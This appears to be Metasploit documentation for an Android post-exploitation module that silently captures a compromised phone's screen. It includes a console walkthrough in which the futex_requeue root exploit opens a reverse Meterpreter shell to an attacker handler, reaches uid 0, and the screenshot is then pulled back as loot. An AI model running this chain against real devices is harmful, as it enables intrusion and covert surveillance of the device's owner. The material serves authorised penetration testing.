documentation/modules/post/android/capture/screen.md
This module takes a screen capture with the Android built-in application to live off the land.
shell or root access is required.
shell or root access on an Android deviceuse post/android/capture/screenset session [session]runPath to the screencap executable on Android device. Default is /system/bin/screencap.
Path to temp directory on Android device to save the screenshot to temporarily. Default is /data/local/tmp/.
Utilizing futex_requeue to get root access.
msf exploit(android/local/futex_requeue) > run
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Using target: New Samsung
[*] Loading exploit library /data/data/com.metasploit.stage/files/cbvzt
[*] Loaded library /data/data/com.metasploit.stage/files/cbvzt, deleting
[*] Waiting 300 seconds for payload
[*] Sending stage (904600 bytes) to 222.222.2.222
[*] Meterpreter session 4 opened (111.111.1.111:4444 -> 222.222.2.222:58577) at 2019-10-22 16:04:31 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > background
[*] Backgrounding session 4...
msf exploit(android/local/futex_requeue) > use post/android/capture/screen
msf post(android/capture/screen) > set session 4
session => 4
msf post(android/capture/screen) > run
[!] SESSION may not be compatible with this module.
[+] Downloading screenshot...
[+] Screenshot saved at /root/.msf4/loot/20191022161242_default_222.222.2.222_screen_capture.s_496457.png
[*] Post module execution completed